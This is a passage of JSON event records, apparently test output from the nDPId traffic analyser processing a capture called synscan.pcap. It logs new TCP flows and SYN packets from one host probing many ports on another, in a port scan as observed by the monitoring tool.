-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"synscan.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsV0YAACkGyCysEAAIQA2GNIzTCK7dU4MZAAAAAGACCAAn3gAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5414,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"synscan.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsJAgAADIG8mqsEAAIQA2GNIzTFSbdU4MZAAAAAGACDAAXZgAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":86,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":990,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"synscan.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAssoIAADUGYPCsEAAIQA2GNIzTA97dU4MZAAAAAGACCAAsrgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":87,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057885,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"synscan.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057885,"pkt":"ACYLMQczACWzv5HuCABFAAAsjhQAACYGlF6sEAAIQA2GNIzTKX3dU4MZAAAAAGACDAADDwAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAslV0AADoGeRWsEAAIQA2GNIzTCi3dU4MZAAAAAGACDAAiXwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10629,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"synscan.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAsFwUAADIG\/22sEAAIQA2GNIzTKYXdU4MZAAAAAGACDAADBwAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057886,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1056,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"synscan.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1278275057886,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057886,"pkt":"ACYLMQczACWzv5HuCABFAAAsnWIAACcGhBCsEAAIQA2GNIzTBCDdU4MZAAAAAGACEAAkbAAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"synscan.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAs4GwAADsGLQasEAAIQA2GNIzSB\/bdUoMYAAAAAGACEAAgmQAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"synscan.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsGQQAAC0GAm+sEAAIQA2GNIzSN57dUoMYAAAAAGACCAD48AAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"synscan.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAspb4AACcGe7SsEAAIQA2GNIzSAgLdUoMYAAAAAGACEAAmjQAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"synscan.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsFWEAADEGAhKsEAAIQA2GNIzSDyjdUoMYAAAAAGACCAAhZwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"synscan.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAso3UAADMGcf2sEAAIQA2GNIzSRdXdUoMYAAAAAGACEADiuQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"synscan.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsMF0AADkG3xWsEAAIQA2GNIzSHmHdUoMYAAAAAGACCAASLgAAAgQFtA=="} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"synscan.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsn0UAADYGcy2sEAAIQA2GNIzSEvDdUoMYAAAAAGACDAAZnwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"synscan.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAs4gcAADQGMmusEAAIQA2GNIzSgArdUoMYAAAAAGACBAC0hAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"synscan.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsXREAADQGt2GsEAAIQA2GNIzSPtDdUoMYAAAAAGACBAD1vgAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"synscan.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsteEAACUGbZGsEAAIQA2GNIzSBjrdUoMYAAAAAGACCAAqVQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057965,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275057965,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"synscan.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1278275057965,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275057965,"pkt":"ACYLMQczACWzv5HuCABFAAAsnHoAADgGc\/isEAAIQA2GNIzS\/ejdUoMYAAAAAGACBAA2pgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAslDEAACYGjkGsEAAIQA2GNIzSBDPdUoMYAAAAAGACDAAoXAAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"synscan.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsoWoAADoGbQisEAAIQA2GNIzSBRTdUoMYAAAAAGACDAAnewAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2701,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"synscan.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAso5AAACsGeeKsEAAIQA2GNIzSCo3dUoMYAAAAAGACEAAeAgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsvS0AAC4GXUWsEAAIQA2GNIzSA0vdUoMYAAAAAGACDAApRAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"synscan.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAscKEAADYGodGsEAAIQA2GNIzSB9XdUoMYAAAAAGACDAAkugAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsersAACgGpbesEAAIQA2GNIzSI\/DdUoMYAAAAAGACBAAQnwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 